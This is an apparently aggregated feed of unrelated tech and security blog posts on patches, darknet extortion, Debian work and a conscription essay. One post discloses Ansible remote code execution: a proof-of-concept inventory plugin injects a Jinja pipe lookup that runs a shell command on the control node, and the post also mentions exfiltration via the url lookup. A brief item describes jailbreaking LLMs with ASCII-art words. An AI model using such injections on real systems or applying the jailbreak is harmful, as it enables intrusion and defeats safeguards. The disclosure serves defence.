If you want a half-million strong army, then you're taking half a million people out of the work force that runs the economy that feeds that army. At peak employment in 2023 the UK had 32.8 million fully employed workers and 1.3 million unemployed ... but you can't assume that 1.3 million is available for national service: a bunch will be medically or psychologically unfit or simply unemployable in any useful capacity. (Anyone who can't fill out the forms to register as disabled due to brain fog but who can't work due to long COVID probably falls into this category, for example.) Realistically, economists describe any national economy with 3% or less unemployment as full employment because a labour market needs some liquidity in order to avoid gridlock. And the UK is dangerously close to that right now. The average employment tenure is about 3 years, so a 3% slack across the labour pool is equivalent to one month of unemployment between jobs—there's barely time to play musical chairs, in other words.

If a notional half-million strong conscript force optimistically means losing 3% of the entire work force, that's going to cause knock-on effects elsewhere in the economy, starting with an inflationary spiral driven by wage rises as employers compete to fill essential positions: that didn't happen in the 1910-1960 era because of mass employment, collective bargaining, and wage and price controls, but the post-1979 conservative consensus has stripped away all these regulatory mechanisms. Market forces, baby!

To make matters worse, they'll be the part of the work force who are physically able to do a job that doesn't involve sitting in a chair all day. Again, Russia has reportedly been drafting legally blind diabetic fifty-somethings: it's hard to imagine them being effective soldiers in a trench war. Meanwhile, if you thought your local NHS hospital was over-stretched today, just wait until all the porters and cleaners get drafted so there's nobody to wash the bedding or distribute the meals or wheel patients in and out of theatre for surgery. And the same goes for your local supermarket, where there's nobody left to take rotting produce off the shelves and replace it with fresh—or, more annoyingly, no truckers to drive HGVs, automobile engineers to service your car, or plumbers to fix your leaky pipes. (The latter three are all gimmes for any functioning military because military organizations are all about logistics first because without logistics the shooty-shooty bang-bangs run out of ammunition really fast.) And you can't draft builders because they're all busy throwing up the barracks for the conscripts to eat, sleep, and shit in, and anyway, without builders the housing shortage is going to get even worse and you end up with more inflation ...

There are a pile of vicious feedback loops in play here, but what it boils down to is: we lack the infrastructure to return to a mass military, whether it's staffed by conscription or traditional recruitment (which in the UK has totally collapsed since the Tories outsourced recruiting to Capita in 2012). It's not just the bodies but the materiel and the crown estate (buildings to put them in). By the time you total up the cost of training an infantryman, the actual payroll saved by using conscripts rather than volunteers works out at a tiny fraction of their cost, and is pissed away on personnel who are not there willingly and will leave at the first opportunity. Meanwhile the economy has been systematically asset-stripped and looted and the general staff can't have an extra £200Bn/year to spend on top of the existing £55Bn budget because Oligarchs Need Yachts or something.

Maybe if we went back to a 90% marginal rate of income tax, reintroduced food rationing, raised the retirement age to 80, expropriated all private property portfolios worth over £1M above the value of the primary residence, and introduced flag-shagging as a mandatory subject in primary schools—in other words: turn our backs on every social change, good or bad, since roughly 1960, and accept a future of regimented poverty and militarism—we could be ready to field a mass conscript army armed with rifles on the battlefields of 2045 ... but frankly it's cheaper to invest in killer robots. Or better still, give peace a chance?

Krebs on SecurityPatch Tuesday, March 2024 Edition

Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple’s new macOS Sonoma addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in iOS 17.4, iPadOS 17.4, and iOS 16.7.6.

Apple’s macOS Sonoma 14.4 Security Update addresses dozens of security issues. Jason Kitka, chief information security officer at Automox, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages [full disclosure: Automox is an advertiser on this site].

On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). Satnam Narang, senior staff research engineer at Tenable, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in Microsoft Authenticator, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

“If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in Open Management Infrastructure (OMI), a Linux-based cloud infrastructure in Microsoft Azure. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said Ben McCarthy, lead cybersecurity engineer at Immersive Labs.

“With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including Adobe Experience Manager, Adobe Premiere Pro, ColdFusion 2023 and 2021, Adobe Bridge, Lightroom, and Adobe Animate. Adobe said it is not aware of active exploitation against any of the flaws.

By the way, Adobe recently enrolled all of its Acrobat users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

Cryptogram Automakers Are Sharing Driver Data with Insurers without Consent

Kasmir Hill has the story:

Modern cars are internet-enabled, allowing access to services like navigation, roadside assistance and car apps that drivers can connect to their vehicles to locate them or unlock them remotely. In recent years, automakers, including G.M., Honda, Kia and Hyundai, have started offering optional features in their connected-car apps that rate people’s driving. Some drivers may not realize that, if they turn on these features, the car companies then give information about how they drive to data brokers like LexisNexis [who then sell it to insurance companies].

Automakers and data brokers that have partnered to collect detailed driving data from millions of Americans say they have drivers’ permission to do so. But the existence of these partnerships is nearly invisible to drivers, whose consent is obtained in fine print and murky privacy policies that few read.

Cryptogram Burglars Using Wi-Fi Jammers to Disable Security Cameras

The arms race continues, as burglars are learning how to use jammers to disable Wi-Fi security cameras.

Planet DebianRussell Coker: Android vs FOSS Phones

To achieve my aims regarding Convergence of mobile phone and PC [1] I need something a big bigger than the 4G of RAM that’s in the PinePhone Pro [2]. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period so it’s not a bad SoC, but it doesn’t compare well to more recent Android devices and it also isn’t a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian.

PostmarketOS

One thing I’m definitely not going to do is attempt a full port of Linux to a different platform or support of kernel etc. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered, the PostmarketOS Wiki page of supported devices [3] was the first place I looked. The “main” supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the “community” devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I’d have to get dock functionality via wifi – not impossible but not great) then I’m left with the SHIFT6mq which was never sold in Australia and the Xiomi POCO F1 which doesn’t appear to be available on ebay.

LineageOS

The libhybris libraries are a compatibility layer between Android and glibc programs [4]. Which includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set and are available in Australia and which could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.

Phone RAM External Display Price
Edge 20 Pro [5] 6-12G HDMI $500 not many on sale
Edge S aka moto G100 [6] 6-8G HDMI $500 to $600+
Fairphone 4 6-8G USBC-DP $1000+
Nubia Red Magic 5G 8-16G USBC-DP $600+

The LineageOS device search page [9] allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 – which aren’t in the kernel.org supported release list [10]. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers, until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop.

Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]. But they don’t have the market power that companies like Google have to tell SoC vendors what they want.

IP Laws and Practices

Bunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]. This is a major factor in the lack of support for FOSS on phones and other devices.

Droidian and Buying a Note 9

The FOSDEM 2023 has a lecture about the Droidian project which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]. It’s interesting how they use containers for the necessary Android apps. Here is the list of devices supported by Droidian [14].

Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from Volla – a company dedicated to making open Android based devices [15]. But they don’t seem to be available on ebay and the new price of the Volla Phone 22 is E452 ($AU750) which is more than I want to pay for a device that isn’t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.

Phone RAM Price Issues
Note 9 128G/512G 6G/8G <$300 Not supporting external display
Galaxy S9+ 6G <$300 Not supporting external display
Xperia 5 6G >$300 Hotspot partly working
OnePlus 3T 6G $200 – $400+ photos not working

I just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian, it has some screen burn but that’s OK for a test system and if I end up using it seriously I’ll just buy another that’s in as-new condition. With no support for an external display I’ll need to setup a software dock to do Convergence, but that’s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I’ll use the 512G/8G model for that and use the cheap one for testing.

Mobian

I should have checked the Mobian list first as it’s the main Debian variant for phones.

From the Mobian Devices list [16] the OnePlus 6T has 8G of RAM or more but isn’t available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn’t seem to be available on ebay. The Shift6mq is made by a German company with similar aims to the Fairphone [17], it looks nice but costs E577 which is more than I want to spend and isn’t on the officially supported list.

Smart Watches

The same issues apply to smart watches. AstereoidOS is a free smart phone OS designed for closed hardware [18]. I don’t have time to get involved in this sort of thing though, I can’t hack on every device I use.

Worse Than FailureCodeSOD: Wait for the End

Donald was cutting a swathe through a jungle of old Java code, when he found this:

protected void waitForEnd(float time) {
	// do nothing
}

Well, this function sure sounds like it's waiting around to die. This protected method is called from a private method, and you might expect that child classes actually implement real functionality in there, but there were no child classes. This was called in several places, and each time it was passed Float.MAX_VALUE as its input.

Poking at that odd function also lead to this more final method:

public void waitAtEnd() {
	System.exit(0);
}

This function doesn't wait for anything- it just ends the program. Finally and decisively. It is the end.

I know the end of this story: many, many developers have worked on this code base, and many of them hoped to clean up the codebase and make it better. Many of them got lost, never to return. Many ran away screaming.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

365 TomorrowsBait

Author: Majoki The float bobs and I feel a slight tug on the line, a nip at the hook. A shiver of guilt, a nanosecond’s exhilaration. I finesse the reel, patient. What will rise? There’s nothing like fishing in a black hole, quantum casting for bits and pieces of worlds beneath, within, among. You just […]

The post Bait appeared first on 365tomorrows.

,

Planet DebianDirk Eddelbuettel: digest 0.6.35 on CRAN: New xxhash code

Release 0.6.35 of the digest package arrived at CRAN today and has also been uploaded to Debian already.

digest creates hash digests of arbitrary R objects. It can use a number different hashing algorithms (md5, sha-1, sha-256, sha-512, crc32, xxhash32, xxhash64, murmur32, spookyhash, blake3,crc32c – and now also xxh3_64 and xxh3_128), and enables easy comparison of (potentially large and nested) R language objects as it relies on the native serialization in R. It is a mature and widely-used package (with 65.8 million downloads just on the partial cloud mirrors of CRAN which keep logs) as many tasks may involve caching of objects for which it provides convenient general-purpose hash key generation to quickly identify the various objects.

This release updates the included xxHash version to the current verion 0.8.2 updating the existing xxhash32 and xxhash64 hash functions — and also adding the newer xxh3_64 and xxh3_128 ones. We have a project at work using xxh3_128 from Python which made me realize having it from R would be nice too, and given the existing infrastructure in the package actually doing so was fairly quick and straightforward.

My CRANberries provides a summary of changes to the previous version. For questions or comments use the issue tracker off the GitHub repo. For documentation (including the changelog) see the documentation site.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianJoachim Breitner: Convenient sandboxed development environment

I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a cabal install, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy.

In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.

Convenient or it won’t happen

Nevertheless I thought I should do something about this. The safest option would probably to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenient, and one that does not get too much in the way of my current habits.

For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are (unlikely) to run code (e.g. git push, git pull from private repositories, gh pr create) from “the outside”, and the actual build environment can do without access to these secrets.

The user experience I thus want is a quick way to enter a “development environment” where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual /home directory.

I initially followed the blog post “Application Isolation using NixOS Containers” by Marcin Sucharski and got something working that mostly did what I wanted, but then a colleague pointed out that tools like firejail can achieve roughly the same with a less “global” setup. I tried to use firejail, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool https://github.com/containers/bubblewrap.

Selective bubblewrapping

This script, called dev and included below, builds a new filesystem namespace with minimal /proc and /dev directories, it’s own /tmp directories. It then binds-mound some directories to make the host’s NixOS system available inside the container (/bin, /usr, the nix store including domain socket, stuff for OpenGL applications). My user’s home directory is taken from ~/.dev-home and some configuration files are bind-mounted for convenient sharing. I intentionally don’t share most of the configuration – for example, a direnv enable in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding .Xauthority file is made available. And finally, if I run dev in a project directory, this project directory is bind mounted writable, and the current working directory is preserved.

The effect is that I can type dev on the command line to enter “dev mode” rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a git push I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.

Clearly, isn’t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in $HOME.

Rough corners

There is more polishing that could be done.

  • In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a xdg-desktop-portal user service, a filtering dbus proxy, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get xdg-desktop-portal to heed my default browser settings…). For now I will live with manually copying and pasting URLs, we’ll see how long this lasts.

  • With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: There is simply no point in running evolution or firefox inside the container, and if I do not even have VSCode or cabal available outside, so that it’s less likely that I forget to enter dev before using these tools.

    It shouldn’t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to bubblewrap here.

So likely I will refine this some more over time. Or get tired of typing dev and going back to what I did before…

The script

The dev script (at the time of writing)

Planet DebianEvgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR

Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell.

Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin

from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):

    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')

The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar.

The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).

And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
{
    "_meta": {
        "hostvars": {
            "exploit.example.com": {
                "ansible_connection": "local",
                "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
            }
        }
    },
    "all": {
        "children": [
            "ungrouped"
        ]
    },
    "ungrouped": {
        "hosts": [
            "exploit.example.com"
        ]
    }
}

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.

Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!

- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]

This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]

TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] => {
    "hostvars[inventory_hostname]": {
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],

        "something_funny": ""
    }
}

PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }} and touch does not return anything. But it did create the file!

% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.

In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

from ansible.utils.unsafe_proxy import wrap_var

self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))

Which then gets rendered as a string when dumping the variables using debug:

"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"

But it seems inventories don't do this:

for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)

(aws_ec2.py)

for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)

(hcloud.py)

for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

(foreman.py)

And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481

But even if we only look at inventories, add_host(host) can be abused in a similar way:

from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):

    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}

PLAY RECAP ************************************************************************************************
lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0

% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host

Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

Cryptogram Jailbreaking LLMs with ASCII Art

Researchers have demonstrated that putting words in ASCII art can cause LLMs—GPT-3.5, GPT-4, Gemini, Claude, and Llama2—to ignore their safety instructions.

Research paper.

Krebs on SecurityIncognito Darknet Market Mass-Extorts Buyers, Sellers

Borrowing from the playbook of ransomware purveyors, the darknet narcotics bazaar Incognito Market has begun extorting all of its vendors and buyers, threatening to publish cryptocurrency transaction and chat records of users who refuse to pay a fee ranging from $100 to $20,000. The bold mass extortion attempt comes just days after Incognito Market administrators reportedly pulled an “exit scam” that left users unable to withdraw millions of dollars worth of funds from the platform.

An extortion message currently on the Incognito Market homepage.

In the past 24 hours, the homepage for the Incognito Market was updated to include a blackmail message from its owners, saying they will soon release purchase records of vendors who refuse to pay to keep the records confidential.

“We got one final little nasty surprise for y’all,” reads the message to Incognito Market users. “We have accumulated a list of private messages, transaction info and order details over the years. You’ll be surprised at the number of people that relied on our ‘auto-encrypt’ functionality. And by the way, your messages and transaction IDs were never actually deleted after the ‘expiry’….SURPRISE SURPRISE!!! Anyway, if anything were to leak to law enforcement, I guess nobody never slipped up.”

Incognito Market says it plans to publish the entire dump of 557,000 orders and 862,000 cryptocurrency transaction IDs at the end of May.

“Whether or not you and your customers’ info is on that list is totally up to you,” the Incognito administrators advised. “And yes, this is an extortion!!!!”

The extortion message includes a “Payment Status” page that lists the darknet market’s top vendors by their handles, saying at the top that “you can see which vendors care about their customers below.” The names in green supposedly correspond to users who have already opted to pay.

The “Payment Status” page set up by the Incognito Market extortionists.

We’ll be publishing the entire dump of 557k orders and 862k crypto transaction IDs at the end of May, whether or not you and your customers’ info is on that list is totally up to you. And yes, this is an extortion!!!!

Incognito Market said it plans to open up a “whitelist portal” for buyers to remove their transaction records “in a few weeks.”

The mass-extortion of Incognito Market users comes just days after a large number of users reported they were no longer able to withdraw funds from their buyer or seller accounts. The cryptocurrency-focused publication Cointelegraph.com reported Mar. 6 that Incognito was exit-scamming its users out of their bitcoins and Monero deposits.

CoinTelegraph notes that Incognito Market administrators initially lied about the situation, and blamed users’ difficulties in withdrawing funds on recent changes to Incognito’s withdrawal systems.

Incognito Market deals primarily in narcotics, so it’s likely many users are now worried about being outed as drug dealers. Creating a new account on Incognito Market presents one with an ad for 5 grams of heroin selling for $450.

New Incognito Market users are treated to an ad for $450 worth of heroin.

The double whammy now hitting Incognito Market users is somewhat akin to the double extortion techniques employed by many modern ransomware groups, wherein victim organizations are hacked, relieved of sensitive information and then presented with two separate ransom demands: One in exchange for a digital key needed to unlock infected systems, and another to secure a promise that any stolen data will not be published or sold, and will be destroyed.

Incognito Market has priced its extortion for vendors based on their status or “level” within the marketplace. Level 1 vendors can supposedly have their information removed by paying a $100 fee. However, larger “Level 5” vendors are asked to cough up $20,000 payments.

The past is replete with examples of similar darknet market exit scams, which tend to happen eventually to all darknet markets that aren’t seized and shut down by federal investigators, said Brett Johnson, a convicted and reformed cybercriminal who built the organized cybercrime community Shadowcrew many years ago.

“Shadowcrew was the precursor to today’s Darknet Markets and laid the foundation for the way modern cybercrime channels still operate today,” Johnson said. “The Truth of Darknet Markets? ALL of them are Exit Scams. The only question is whether law enforcement can shut down the market and arrest its operators before the exit scam takes place.”

365 TomorrowsBreaking News

Author: Julian Miles, Staff Writer Condor’s back. Ten years ago he stood in front of me, the rain streaming down his face failing to dim the fire in his eyes. In reply to my question about why I should hold off reporting, he offered me a datacard. “Your enthusiasm gets you involved in dangerous events. […]

The post Breaking News appeared first on 365tomorrows.

Worse Than FailureCodeSOD: Some Original Code

FreeBSDGuy sends us a VB .Net snippet, which layers on a series of mistakes:

If (gLang = "en") Then
    If (item.Text.Equals("Original")) Then
        item.Enabled = False
    End If
ElseIf (gLang = "fr") Then
    If (item.Text.Equals("Originale")) Then
        item.Enabled = False
    End If
Else
    If (item.Text.Equals("Original")) Then
        item.Enabled = False
    End If
End If

The goal of this code is to disable the "original" field, so the user can't edit it. To do this, it checks what language the application is configured to use, and then based on the language, checks for the word "Original" in either English or French.

The first obvious mistake is that we're identifying UI widgets based on the text inside of them, instead of by some actual identifier.

As an aside, this text sure as heck sounds like a label which already doesn't allow editing, so I think they're using the wrong widget here, but I can't be sure.

Then we're hard-coding in our string for comparison, which is already not great, but then we are hard-coding in two languages. It's worth noting that .NET has some pretty robust internationalization features that help you externalize those strings. I suspect this app has a lot of if (gLang = "en") calls scattered around, instead of letting the framework handle it.

But there's one final problem that this code doesn't make clear: they are using more unique identifiers to find this widget, so they don't actually need to do the If (item.Text.Equals("Original")) check. FreeBSDGuy replaced this entire block with a single line:

 item.Enabled = False
[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

xkcdSupergroup

Cryptogram Using LLMs to Unredact Text

Initial results in using LLMs to unredact text based on the size of the individual-word redaction rectangles.

This feels like something that a specialized ML system could be trained on.

,

Planet DebianThorsten Alteholz: My Debian Activities in February 2024

FTP master

This month I accepted 242 and rejected 42 packages. The overall number of packages that got accepted was 251.

This was just a short month and the weather outside was not really motivating. I hope it will be better in March.

Debian LTS

This was my hundred-sixteenth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.

During my allocated time I uploaded:

  • [DLA 3739-1] libjwt security update for one CVE to fix some ‘constant-time-for-execution-issue
  • [libjwt] upload to unstable
  • [#1064550] Bullseye PU bug for libjwt
  • [#1064551] Bookworm PU bug for libjwt
  • [#1064551] Bookworm PU bug for libjwt; upload after approval
  • [DLA 3741-1] engrampa security update for one CVE to fix a path traversal issue with CPIO archives
  • [#1060186] Bookworm PU-bug for libde265 was flagged for acceptance
  • [#1056935] Bullseye PU-bug for libde265 was flagged for acceptance

I also started to work on qtbase-opensource-src (an update is needed for ELTS, so an LTS update seems to be appropriate as well, especially as there are postponed CVE).

Debian ELTS

This month was the sixty-seventth ELTS month. During my allocated time I uploaded:

  • [ELA-1047-1]bind9 security update for one CVE to fix an stack exhaustion issue in Jessie and Stretch

The upload of bind9 was a bit exciting, but all occuring issues with the new upload workflow could be quickly fixed by Helmut and the packages finally reached their destination. I wonder why it is always me who stumbles upon special cases? This month I also worked on the Jessie and Stretch updates for exim4. I also started to work on an update for qtbase-opensource-src in Stretch (and LTS and other releases as well).

Debian Printing

This month I uploaded new upstream versions of:

This work is generously funded by Freexian!

Debian Matomo

